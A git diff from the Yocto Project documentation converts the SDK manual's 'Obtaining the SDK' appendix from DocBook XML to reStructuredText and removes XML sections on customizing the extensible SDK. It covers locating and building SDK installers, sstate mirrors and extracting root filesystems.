-                "<link linkend='sdk-applying-updates-to-an-installed-extensible-sdk'>Applying Updates to an Installed Extensible SDK</link>"
-                section.
-                </para></listitem>
-            <listitem><para>
-                Build the extensible SDK normally (i.e., use the
-                <filename>bitbake -c populate_sdk_ext</filename> <replaceable>imagename</replaceable>
-                command).
-                </para></listitem>
-            <listitem><para>
-                Publish the SDK using the following command:
-                <literallayout class='monospaced'>
-     $ oe-publish-sdk <replaceable>some_path</replaceable>/sdk-installer.sh <replaceable>path_to_shared_http_directory</replaceable>
-                </literallayout>
-                You must repeat this step each time you rebuild the SDK
-                with changes that you want to make available through the
-                update mechanism.
-                </para></listitem>
-        </orderedlist>
-    </para>
-
-    <para>
-        Completing the above steps allows users of the existing installed
-        SDKs to simply run <filename>devtool sdk-update</filename> to
-        retrieve and apply the latest updates.
-        See the
-        "<link linkend='sdk-applying-updates-to-an-installed-extensible-sdk'>Applying Updates to an Installed Extensible SDK</link>"
-        section for further information.
-    </para>
-</section>
-
-<section id='sdk-changing-the-default-sdk-installation-directory'>
-    <title>Changing the Default SDK Installation Directory</title>
-
-    <para>
-        When you build the installer for the Extensible SDK, the default
-        installation directory for the SDK is based on the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
-        and
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKEXTPATH'><filename>SDKEXTPATH</filename></ulink>
-        variables from within the
-        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></ulink>
-        class as follows:
-        <literallayout class='monospaced'>
-     SDKEXTPATH ??= "~/${@d.getVar('DISTRO')}_sdk"
-        </literallayout>
-        You can change this default installation directory by specifically
-        setting the <filename>SDKEXTPATH</filename> variable.
-    </para>
-
-    <para>
-        While a number of ways exist through which you can set this variable,
-        the method that makes the most sense is to set the variable in your
-        distribution's configuration file.
-        Doing so creates an SDK installer default directory that applies
-        across your distribution.
-        As an example, assume you have your own layer for your distribution
-        named "meta-mydistro" and you are using the same type of file
-        hierarchy as does the default "poky" distribution.
-        If so, you could update the <filename>SDKEXTPATH</filename> variable
-        in the
-        <filename>~/meta-mydistro/conf/distro/mydistro.conf</filename> file
-        using the following form:
-        <literallayout class='monospaced'>
-     SDKEXTPATH = "<replaceable>some_path_for_your_installed_sdk</replaceable>"
-        </literallayout>
-    </para>
-
-    <para>
-        After building your installer, running it prompts the user for
-        acceptance of the
-        <replaceable>some_path_for_your_installed_sdk</replaceable> directory
-        as the default location to install the Extensible SDK.
-    </para>
-</section>
-
-<section id='sdk-providing-additional-installable-extensible-sdk-content'>
-    <title>Providing Additional Installable Extensible SDK Content</title>
-
-    <para>
-        If you want the users of an extensible SDK you build to be
-        able to add items to the SDK without requiring the users to build
-        the items from source, you need to do a number of things:
-        <orderedlist>
-            <listitem><para>
-                Ensure the additional items you want the user to be able to
-                install are already built:
-                <itemizedlist>
-                    <listitem><para>
-                        Build the items explicitly.
-                        You could use one or more "meta" recipes that depend
-                        on lists of other recipes.
-                        </para></listitem>
-                    <listitem><para>
-                        Build the "world" target and set
-                        <filename>EXCLUDE_FROM_WORLD_pn-</filename><replaceable>recipename</replaceable>
-                        for the recipes you do not want built.
-                        See the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-EXCLUDE_FROM_WORLD'><filename>EXCLUDE_FROM_WORLD</filename></ulink>
-                        variable for additional information.
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-            <listitem><para>
-                Expose the <filename>sstate-cache</filename> directory
-                produced by the build.
-                Typically, you expose this directory by making it available
-                through an
-                <ulink url='https://en.wikipedia.org/wiki/Apache_HTTP_Server'>Apache HTTP Server</ulink>
-                or
-                <ulink url='https://en.wikipedia.org/wiki/Nginx'>Nginx</ulink>
-                server.
-                </para></listitem>
-            <listitem><para>
-                Set the appropriate configuration so that the produced SDK
-                knows how to find the configuration.
-                The variable you need to set is
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></ulink>:
-                <literallayout class='monospaced'>
-     SSTATE_MIRRORS = "file://.*  http://<replaceable>example</replaceable>.com/<replaceable>some_path</replaceable>/sstate-cache/PATH"
-                </literallayout>
-                You can set the <filename>SSTATE_MIRRORS</filename> variable
-                in two different places:
-                <itemizedlist>
-                    <listitem><para>
-                        If the mirror value you are setting is appropriate to
-                        be set for both the OpenEmbedded build system that is
-                        actually building the SDK and the SDK itself (i.e. the
-                        mirror is accessible in both places or it will fail
-                        quickly on the OpenEmbedded build system side, and its
-                        contents will not interfere with the build), then you
-                        can set the variable in your
-                        <filename>local.conf</filename> or custom distro
-                        configuration file.
-                        You can then "whitelist" the variable through
-                        to the SDK by adding the following:
-                        <literallayout class='monospaced'>
-     SDK_LOCAL_CONF_WHITELIST = "SSTATE_MIRRORS"
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Alternatively, if you just want to set the
-                        <filename>SSTATE_MIRRORS</filename> variable's value
-                        for the SDK alone, create a
-                        <filename>conf/sdk-extra.conf</filename> file either in
-                        your
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                        or within any layer and put your
-                        <filename>SSTATE_MIRRORS</filename> setting within
-                        that file.
-                        <note>
-                            This second option is the safest option should
-                            you have any doubts as to which method to use when
-                            setting <filename>SSTATE_MIRRORS</filename>.
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id='sdk-minimizing-the-size-of-the-extensible-sdk-installer-download'>
-    <title>Minimizing the Size of the Extensible SDK Installer Download</title>
-
-    <para>
-        By default, the extensible SDK bundles the shared state artifacts for
-        everything needed to reconstruct the image for which the SDK was built.
-        This bundling can lead to an SDK installer file that is a Gigabyte or
-        more in size.
-        If the size of this file causes a problem, you can build an SDK that
-        has just enough in it to install and provide access to the
-        <filename>devtool command</filename> by setting the following in your
-        configuration:
-        <literallayout class='monospaced'>
-     SDK_EXT_TYPE = "minimal"
-        </literallayout>
-        Setting
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></ulink>
-        to "minimal" produces an SDK installer that is around 35 Mbytes in
-        size, which downloads and installs quickly.
-        You need to realize, though, that the minimal installer does not
-        install any libraries or tools out of the box.
-        These libraries and tools must be installed either "on the fly" or
-        through actions you perform using <filename>devtool</filename> or
-        explicitly with the <filename>devtool sdk-install</filename> command.
-    </para>
-
-    <para>
-        In most cases, when building a minimal SDK you need to also enable
-        bringing in the information on a wider range of packages produced by
-        the system.
-        Requiring this wider range of information is particularly true
-        so that <filename>devtool add</filename> is able to effectively map
-        dependencies it discovers in a source tree to the appropriate recipes.
-        Additionally, the information enables the
-        <filename>devtool search</filename> command to return useful results.
-    </para>
-
-    <para>
-        To facilitate this wider range of information, you would need to
-        set the following:
-        <literallayout class='monospaced'>
-     SDK_INCLUDE_PKGDATA = "1"
-        </literallayout>
-        See the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_PKGDATA'><filename>SDK_INCLUDE_PKGDATA</filename></ulink>
-        variable for additional information.
-    </para>
-
-    <para>
-        Setting the <filename>SDK_INCLUDE_PKGDATA</filename> variable as
-        shown causes the "world" target to be built so that information
-        for all of the recipes included within it are available.
-        Having these recipes available increases build time significantly and
-        increases the size of the SDK installer by 30-80 Mbytes depending on
-        how many recipes are included in your configuration.
-    </para>
-
-    <para>
-        You can use
-        <filename>EXCLUDE_FROM_WORLD_pn-</filename><replaceable>recipename</replaceable>
-        for recipes you want to exclude.
-        However, it is assumed that you would need to be building the "world"
-        target if you want to provide additional items to the SDK.
-        Consequently, building for "world" should not represent undue
-        overhead in most cases.
-        <note>
-            If you set <filename>SDK_EXT_TYPE</filename> to "minimal",
-            then providing a shared state mirror is mandatory so that items
-            can be installed as needed.
-            See the
-            "<link linkend='sdk-providing-additional-installable-extensible-sdk-content'>Providing Additional Installable Extensible SDK Content</link>"
-            section for more information.
-        </note>
-    </para>
-
-    <para>
-        You can explicitly control whether or not to include the toolchain
-        when you build an SDK by setting the
-        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_TOOLCHAIN'><filename>SDK_INCLUDE_TOOLCHAIN</filename></ulink>
-        variable to "1".
-        In particular, it is useful to include the toolchain when you
-        have set <filename>SDK_EXT_TYPE</filename> to "minimal", which by
-        default, excludes the toolchain.
-        Also, it is helpful if you are building a small SDK for use with
-        an IDE or some
-        other tool where you do not want to take extra steps to install a
-        toolchain.
-    </para>
-</section>
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-appendix-obtain.rst b/documentation/sdk-manual/sdk-appendix-obtain.rst
new file mode 100644
index 0000000000..a51c22e399
--- /dev/null
+++ b/documentation/sdk-manual/sdk-appendix-obtain.rst
@@ -0,0 +1,321 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****************
+Obtaining the SDK
+*****************
+
+.. _sdk-locating-pre-built-sdk-installers:
+
+Locating Pre-Built SDK Installers
+=================================
+
+You can use existing, pre-built toolchains by locating and running an
+SDK installer script that ships with the Yocto Project. Using this
+method, you select and download an architecture-specific SDK installer
+and then run the script to hand-install the toolchain.
+
+Follow these steps to locate and hand-install the toolchain:
+
+1. *Go to the Installers Directory:* Go to
+   :yocto_dl:`/releases/yocto/yocto-3.1.2/toolchain/`
+
+2. *Open the Folder for Your Build Host:* Open the folder that matches
+   your :term:`Build Host` (i.e.
+   ``i686`` for 32-bit machines or ``x86_64`` for 64-bit machines).
+
+3. *Locate and Download the SDK Installer:* You need to find and
+   download the installer appropriate for your build host, target
+   hardware, and image type.
+
+   The installer files (``*.sh``) follow this naming convention:
+   ::
+
+      poky-glibc-host_system-core-image-type-arch-toolchain[-ext]-release.sh
+
+      Where:
+          host_system is a string representing your development system:
+                 "i686" or "x86_64"
+
+          type is a string representing the image:
+                "sato" or "minimal"
+
+          arch is a string representing the target architecture:
+                 "aarch64", "armv5e", "core2-64", "coretexa8hf-neon", "i586", "mips32r2",
+                 "mips64", or "ppc7400"
+
+          release is the version of Yocto Project.
+
+          NOTE:
+             The standard SDK installer does not have the "-ext" string as
+             part of the filename.
+
+
+   The toolchains provided by the Yocto
+   Project are based off of the ``core-image-sato`` and
+   ``core-image-minimal`` images and contain libraries appropriate for
+   developing against those images.
+
+   For example, if your build host is a 64-bit x86 system and you need
+   an extended SDK for a 64-bit core2 target, go into the ``x86_64``
+   folder and download the following installer:
+   ::
+
+      poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-DISTRO.sh
+
+4. *Run the Installer:* Be sure you have execution privileges and run
+   the installer. Following is an example from the ``Downloads``
+   directory:
+   ::
+
+      $ ~/Downloads/poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-DISTRO.sh
+
+   During execution of the script, you choose the root location for the
+   toolchain. See the "`Installed Standard SDK Directory
+   Structure <#sdk-installed-standard-sdk-directory-structure>`__"
+   section and the "`Installed Extensible SDK Directory
+   Structure <#sdk-installed-extensible-sdk-directory-structure>`__"
+   section for more information.
+
+Building an SDK Installer
+=========================
+
+As an alternative to locating and downloading an SDK installer, you can
+build the SDK installer. Follow these steps:
+
+1. *Set Up the Build Environment:* Be sure you are set up to use BitBake
+   in a shell. See the ":ref:`dev-manual/dev-manual-start:preparing the build host`" section
+   in the Yocto Project Development Tasks Manual for information on how
+   to get a build host ready that is either a native Linux machine or a
+   machine that uses CROPS.
+
+2. *Clone the ``poky`` Repository:* You need to have a local copy of the
+   Yocto Project :term:`Source Directory`
+   (i.e. a local
+   ``poky`` repository). See the ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`" and
+   possibly the ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`" and
+   ":ref:`checkout-out-by-tag-in-poky`" sections
+   all in the Yocto Project Development Tasks Manual for information on
+   how to clone the ``poky`` repository and check out the appropriate
+   branch for your work.
+
+3. *Initialize the Build Environment:* While in the root directory of
+   the Source Directory (i.e. ``poky``), run the
+   :ref:`structure-core-script` environment
+   setup script to define the OpenEmbedded build environment on your
+   build host.
+   ::
+
+      $ source oe-init-build-env
+
+   Among other things, the script
+   creates the :term:`Build Directory`,
+   which is
+   ``build`` in this case and is located in the Source Directory. After
+   the script runs, your current working directory is set to the
+   ``build`` directory.
+
+4. *Make Sure You Are Building an Installer for the Correct Machine:*
+   Check to be sure that your
+   :term:`MACHINE` variable in the
+   ``local.conf`` file in your Build Directory matches the architecture
+   for which you are building.
+
+5. *Make Sure Your SDK Machine is Correctly Set:* If you are building a
+   toolchain designed to run on an architecture that differs from your
+   current development host machine (i.e. the build host), be sure that
+   the :term:`SDKMACHINE` variable
+   in the ``local.conf`` file in your Build Directory is correctly set.
+
+   .. note::
+
+      If you are building an SDK installer for the Extensible SDK, the
+      SDKMACHINE
+      value must be set for the architecture of the machine you are
+      using to build the installer. If
+      SDKMACHINE
+      is not set appropriately, the build fails and provides an error
+      message similar to the following:
+      ::
+
+              The extensible SDK can currently only be built for the same architecture as the machine being built on - SDK_ARCH is
+              set to i686 (likely via setting SDKMACHINE) which is different from the architecture of the build machine (x86_64).
+              Unable to continue.
+
+
+6. *Build the SDK Installer:* To build the SDK installer for a standard
+   SDK and populate the SDK image, use the following command form. Be
+   sure to replace image with an image (e.g. "core-image-sato"): $
+   bitbake image -c populate_sdk You can do the same for the extensible
+   SDK using this command form:
+   ::
+
+      $ bitbake image -c populate_sdk_ext
+
+   These commands produce an SDK installer that contains the sysroot
+   that matches your target root filesystem.
+
+   When the ``bitbake`` command completes, the SDK installer will be in
+   ``tmp/deploy/sdk`` in the Build Directory.
+
+   .. note::
+
+      -  By default, the previous BitBake command does not build static
+         binaries. If you want to use the toolchain to build these types
+         of libraries, you need to be sure your SDK has the appropriate
+         static development libraries. Use the
+         :term:`TOOLCHAIN_TARGET_TASK`
+         variable inside your ``local.conf`` file before building the
+         SDK installer. Doing so ensures that the eventual SDK
+         installation process installs the appropriate library packages
+         as part of the SDK. Following is an example using ``libc``
+         static development libraries: TOOLCHAIN_TARGET_TASK_append = "
+         libc-staticdev"
+
+7. *Run the Installer:* You can now run the SDK installer from
+   ``tmp/deploy/sdk`` in the Build Directory. Following is an example:
+   ::
+
+      $ cd ~/poky/build/tmp/deploy/sdk
+      $ ./poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-DISTRO.sh
+
+   During execution of the script, you choose the root location for the
+   toolchain. See the "`Installed Standard SDK Directory
+   Structure <#sdk-installed-standard-sdk-directory-structure>`__"
+   section and the "`Installed Extensible SDK Directory
+   Structure <#sdk-installed-extensible-sdk-directory-structure>`__"
+   section for more information.
+
+Extracting the Root Filesystem
+==============================
+
+After installing the toolchain, for some use cases you might need to
+separately extract a root filesystem:
+
+-  You want to boot the image using NFS.
+
+-  You want to use the root filesystem as the target sysroot.
+
+-  You want to develop your target application using the root filesystem
+   as the target sysroot.
+
+Follow these steps to extract the root filesystem:
+
+1. *Locate and Download the Tarball for the Pre-Built Root Filesystem
+   Image File:* You need to find and download the root filesystem image
+   file that is appropriate for your target system. These files are kept
+   in machine-specific folders in the
+   :yocto_dl:`Index of Releases </releases/yocto/yocto-3.1.2/machines/>`
+   in the "machines" directory.
+
+   The machine-specific folders of the "machines" directory contain
+   tarballs (``*.tar.bz2``) for supported machines. These directories
+   also contain flattened root filesystem image files (``*.ext4``),
+   which you can use with QEMU directly.
+
+   The pre-built root filesystem image files follow these naming
+   conventions:
+   ::
+
+      core-image-profile-arch.tar.bz2
+
+      Where:
+          profile is the filesystem image's profile:
+                    lsb, lsb-dev, lsb-sdk, minimal, minimal-dev, minimal-initramfs,
+                    sato, sato-dev, sato-sdk, sato-sdk-ptest. For information on
+                    these types of image profiles, see the "Images" chapter in
+                    the Yocto Project Reference Manual.
+
+          arch is a string representing the target architecture:
+                    beaglebone-yocto, beaglebone-yocto-lsb, edgerouter, edgerouter-lsb,
+                    genericx86, genericx86-64, genericx86-64-lsb, genericx86-lsb and qemu*.
+
+   The root filesystems
+   provided by the Yocto Project are based off of the
+   ``core-image-sato`` and ``core-image-minimal`` images.
+
+   For example, if you plan on using a BeagleBone device as your target
+   hardware and your image is a ``core-image-sato-sdk`` image, you can
+   download the following file:
+   ::
+
+      core-image-sato-sdk-beaglebone-yocto.tar.bz2
+
+2. *Initialize the Cross-Development Environment:* You must ``source``
+   the cross-development environment setup script to establish necessary
+   environment variables.
+
+   This script is located in the top-level directory in which you
+   installed the toolchain (e.g. ``poky_sdk``).
+
+   Following is an example based on the toolchain installed in the
+   ":ref:`sdk-locating-pre-built-sdk-installers`" section:
+   ::
+
+      $ source ~/poky_sdk/environment-setup-core2-64-poky-linux
+
+3. *Extract the Root Filesystem:* Use the ``runqemu-extract-sdk``
+   command and provide the root filesystem image.
+
+   Following is an example command that extracts the root filesystem
+   from a previously built root filesystem image that was downloaded
+   from the :yocto_dl:`Index of Releases </releases/yocto/yocto-3.1.2/machines/>`.
+   This command extracts the root filesystem into the ``core2-64-sato``
+   directory:
+   ::
+
+      $ runqemu-extract-sdk ~/Downloads/core-image-sato-sdk-beaglebone-yocto.tar.bz2 ~/beaglebone-sato
+
+   You could now point to the target sysroot at ``beablebone-sato``.
+
+Installed Standard SDK Directory Structure
+==========================================
+
+The following figure shows the resulting directory structure after you
+install the Standard SDK by running the ``*.sh`` SDK installation
+script:
+
+.. image:: figures/sdk-installed-standard-sdk-directory.png
+   :scale: 80%
+   :align: center
+
+The installed SDK consists of an environment setup script for the SDK, a
+configuration file for the target, a version file for the target, and
+the root filesystem (``sysroots``) needed to develop objects for the
+target system.
+
+Within the figure, italicized text is used to indicate replaceable
+portions of the file or directory name. For example, install_dir/version
+is the directory where the SDK is installed. By default, this directory
+is ``/opt/poky/``. And, version represents the specific snapshot of the
+SDK (e.g. 3.1.2). Furthermore, target represents the target architecture
+(e.g. ``i586``) and host represents the development system's
+architecture (e.g. ``x86_64``). Thus, the complete names of the two
+directories within the ``sysroots`` could be ``i586-poky-linux`` and
+``x86_64-pokysdk-linux`` for the target and host, respectively.
+
+Installed Extensible SDK Directory Structure
+============================================
+
+The following figure shows the resulting directory structure after you
+install the Extensible SDK by running the ``*.sh`` SDK installation
+script:
+
+.. image:: figures/sdk-installed-extensible-sdk-directory.png
+   :scale: 80%
+   :align: center
+
+The installed directory structure for the extensible SDK is quite
+different than the installed structure for the standard SDK. The
+extensible SDK does not separate host and target parts in the same
+manner as does the standard SDK. The extensible SDK uses an embedded
+copy of the OpenEmbedded build system, which has its own sysroots.
+
+Of note in the directory structure are an environment setup script for
+the SDK, a configuration file for the target, a version file for the
+target, and log files for the OpenEmbedded build system preparation
+script run by the installer and BitBake.
+
+Within the figure, italicized text is used to indicate replaceable
+portions of the file or directory name. For example, install_dir is the
+directory where the SDK is installed, which is ``poky_sdk`` by default,
+and target represents the target architecture (e.g. ``i586``).
diff --git a/documentation/sdk-manual/sdk-appendix-obtain.xml b/documentation/sdk-manual/sdk-appendix-obtain.xml
deleted file mode 100644
index 86b6d7dd07..0000000000
--- a/documentation/sdk-manual/sdk-appendix-obtain.xml
+++ /dev/null
@@ -1,443 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='sdk-appendix-obtain'>
-
-<title>Obtaining the SDK</title>
-
-<section id='sdk-locating-pre-built-sdk-installers'>
-    <title>Locating Pre-Built SDK Installers</title>
-
-    <para>
-        You can use existing, pre-built toolchains by locating and running
-        an SDK installer script that ships with the Yocto Project.
-        Using this method, you select and download an architecture-specific
-        SDK installer and then run the script to hand-install the
-        toolchain.
-    </para>
-
-    <para>
-        Follow these steps to locate and hand-install the toolchain:
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Go to the Installers Directory:</emphasis>
-                Go to <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'></ulink>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Open the Folder for Your Build Host:</emphasis>
-                Open the folder that matches your
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>build host</ulink>
-                (i.e. <filename>i686</filename> for 32-bit machines or
-                <filename>x86_64</filename> for 64-bit machines).
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Locate and Download the SDK Installer:</emphasis>
-                You need to find and download the installer appropriate for
-                your build host, target hardware, and image type.
-                </para>
-
-                <para>The installer files (<filename>*.sh</filename>) follow
-                this naming convention:
-                <literallayout class='monospaced'>
-     poky-glibc-<replaceable>host_system</replaceable>-core-image-<replaceable>type</replaceable>-<replaceable>arch</replaceable>-toolchain[-ext]-<replaceable>release</replaceable>.sh
-
-     Where:
-         <replaceable>host_system</replaceable> is a string representing your development system:
-                "i686" or "x86_64"
-
-         <replaceable>type</replaceable> is a string representing the image:
-                "sato" or "minimal"
-
-         <replaceable>arch</replaceable> is a string representing the target architecture:
-                "aarch64", "armv5e", "core2-64", "coretexa8hf-neon", "i586", "mips32r2",
-                "mips64", or "ppc7400"
-
-         <replaceable>release</replaceable> is the version of Yocto Project.
-
-         NOTE:
-            The standard SDK installer does not have the "-ext" string as
-            part of the filename.
-
-                </literallayout>
-                The toolchains provided by the Yocto Project are based off of
-                the <filename>core-image-sato</filename> and
-                <filename>core-image-minimal</filename> images and contain
-                libraries appropriate for developing against those images.
-                </para>
-
-                <para>For example, if your build host is a 64-bit x86 system
-                and you need an extended SDK for a 64-bit core2 target, go
-                into the <filename>x86_64</filename> folder and download the
-                following installer:
-                <literallayout class='monospaced'>
-     poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-&DISTRO;.sh
-                </literallayout>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Run the Installer:</emphasis>
-                Be sure you have execution privileges and run the installer.
-                Following is an example from the <filename>Downloads</filename>
-                directory:
-                <literallayout class='monospaced'>
-     $ ~/Downloads/poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-&DISTRO;.sh
-                </literallayout>
-                During execution of the script, you choose the root location
-                for the toolchain.
-                See the
-                "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
-                section and the
-                "<link linkend='sdk-installed-extensible-sdk-directory-structure'>Installed Extensible SDK Directory Structure</link>"
-                section for more information.
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id='sdk-building-an-sdk-installer'>
-    <title>Building an SDK Installer</title>
-
-    <para>
-        As an alternative to locating and downloading an SDK installer,
-        you can build the SDK installer.
-        Follow these steps:
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Set Up the Build Environment:</emphasis>
-                Be sure you are set up to use BitBake in a shell.
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
-                section in the Yocto Project Development Tasks Manual for
-                information on how to get a build host ready that is either a
-                native Linux machine or a machine that uses CROPS.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Clone the <filename>poky</filename> Repository:</emphasis>
-                You need to have a local copy of the Yocto Project
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                (i.e. a local <filename>poky</filename> repository).
-                See the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</ulink>"
-                and possibly the
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out by Branch in Poky</ulink>"
-                and
-                "<ulink url='&YOCTO_DOCS_DEV_URL;#checkout-out-by-tag-in-poky'>Checking Out by Tag in Poky</ulink>"
-                sections all in the Yocto Project Development Tasks Manual for
-                information on how to clone the <filename>poky</filename>
-                repository and check out the appropriate branch for your work.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Initialize the Build Environment:</emphasis>
-                While in the root directory of the Source Directory (i.e.
-                <filename>poky</filename>), run the
-                <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
-                environment setup script to define the OpenEmbedded
-                build environment on your build host.
-                <literallayout class='monospaced'>
-     $ source &OE_INIT_FILE;
-                </literallayout>
-                Among other things, the script creates the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
-                which is <filename>build</filename> in this case
-                and is located in the Source Directory.
-                After the script runs, your current working directory
-                is set to the <filename>build</filename> directory.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Sure You Are Building an Installer for the Correct Machine:</emphasis>
-                Check to be sure that your
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
-                variable in the <filename>local.conf</filename> file in your
-                Build Directory matches the architecture for which you are
-                building.
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Make Sure Your SDK Machine is Correctly Set:</emphasis>
-                If you are building a toolchain designed to run on an
-                architecture that differs from your current development host
-                machine (i.e. the build host), be sure that the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>
-                variable in the <filename>local.conf</filename> file in your
-                Build Directory is correctly set.
-                <note>
-                    If you are building an SDK installer for the Extensible
-                    SDK, the <filename>SDKMACHINE</filename> value must be
-                    set for the architecture of the machine you are using to
-                    build the installer.
-                    If <filename>SDKMACHINE</filename> is not set appropriately,
-                    the build fails and provides an error message similar to
-                    the following:
-                    <literallayout class='monospaced'>
-     The extensible SDK can currently only be built for the same architecture as the machine being built on - SDK_ARCH is
-     set to i686 (likely via setting SDKMACHINE) which is different from the architecture of the build machine (x86_64).
-     Unable to continue.
-                    </literallayout>
-                </note>
-                </para></listitem>
-            <listitem><para>
-                <emphasis>Build the SDK Installer:</emphasis>
-                To build the SDK installer for a standard SDK and populate
-                the SDK image, use the following command form.
-                Be sure to replace <replaceable>image</replaceable> with
-                an image (e.g. "core-image-sato"):
-                <literallayout class='monospaced'>
-     $ bitbake <replaceable>image</replaceable> -c populate_sdk
-                </literallayout>
-                You can do the same for the extensible SDK using this command
-                form:
-                <literallayout class='monospaced'>
-     $ bitbake <replaceable>image</replaceable> -c populate_sdk_ext
-                </literallayout>
-                These commands produce an SDK installer that contains the
-                sysroot that matches your target root filesystem.</para>
-
-                <para>When the <filename>bitbake</filename> command completes,
-                the SDK installer will be in
-                <filename>tmp/deploy/sdk</filename> in the Build Directory.
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            By default, the previous BitBake command does not
-                            build static binaries.
-                            If you want to use the toolchain to build these
-                            types of libraries, you need to be sure your SDK
-                            has the appropriate static development libraries.
-                            Use the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_TARGET_TASK'><filename>TOOLCHAIN_TARGET_TASK</filename></ulink>
-                            variable inside your <filename>local.conf</filename>
-                            file before building the SDK installer.
-                            Doing so ensures that the eventual SDK installation
-                            process installs the appropriate library packages
-                            as part of the SDK.
-                            Following is an example using
-                            <filename>libc</filename> static development
-                            libraries:
-                            <literallayout class='monospaced'>
-     TOOLCHAIN_TARGET_TASK_append = " libc-staticdev"
-                            </literallayout>
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-            </para></listitem>
-            <listitem><para>
-                <emphasis>Run the Installer:</emphasis>
-                You can now run the SDK installer from
-                <filename>tmp/deploy/sdk</filename> in the Build Directory.
-                Following is an example:
-                <literallayout class='monospaced'>
-     $ cd ~/poky/build/tmp/deploy/sdk
-     $ ./poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-&DISTRO;.sh
-                </literallayout>
-                During execution of the script, you choose the root location
-                for the toolchain.
-                See the
-                "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
-                section and the
-                "<link linkend='sdk-installed-extensible-sdk-directory-structure'>Installed Extensible SDK Directory Structure</link>"
-                section for more information.
-                </para></listitem>
-        </orderedlist>
-    </para>
-</section>
-
-<section id='sdk-extracting-the-root-filesystem'>
-    <title>Extracting the Root Filesystem</title>
-
-    <para>
-        After installing the toolchain, for some use cases you
-        might need to separately extract a root filesystem:
-        <itemizedlist>
-            <listitem><para>
-                You want to boot the image using NFS.
-                </para></listitem>
-            <listitem><para>
-                You want to use the root filesystem as the
-                target sysroot.
-                </para></listitem>
-            <listitem><para>
-                You want to develop your target application
-                using the root filesystem as the target sysroot.
-                </para></listitem>
-        </itemizedlist>
-    </para>
-
-    <para>
-        Follow these steps to extract the root filesystem:
-        <orderedlist>
-            <listitem><para>
-                <emphasis>Locate and Download the Tarball for the Pre-Built
-                Root Filesystem Image File:</emphasis>
-                You need to find and download the root filesystem image
-                file that is appropriate for your target system.
-                These files are kept in machine-specific folders in the
-                <ulink url='&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;/machines/'>Index of Releases</ulink>
-                in the "machines" directory.</para>
-
-                <para>The machine-specific folders of the "machines" directory
-                contain tarballs (<filename>*.tar.bz2</filename>) for supported
-                machines.
-                These directories also contain flattened root filesystem
-                image files (<filename>*.ext4</filename>), which you can use
-                with QEMU directly.</para>
-
-                <para>The pre-built root filesystem image files
-                follow these naming conventions:
-                <literallayout class='monospaced'>
-<!--
-     core-image-<replaceable>profile</replaceable>-<replaceable>arch</replaceable>-<replaceable>date_time</replaceable>.rootfs.tar.bz2
--->
-     core-image-<replaceable>profile</replaceable>-<replaceable>arch</replaceable>.tar.bz2
-
-     Where:
-         <replaceable>profile</replaceable> is the filesystem image's profile:
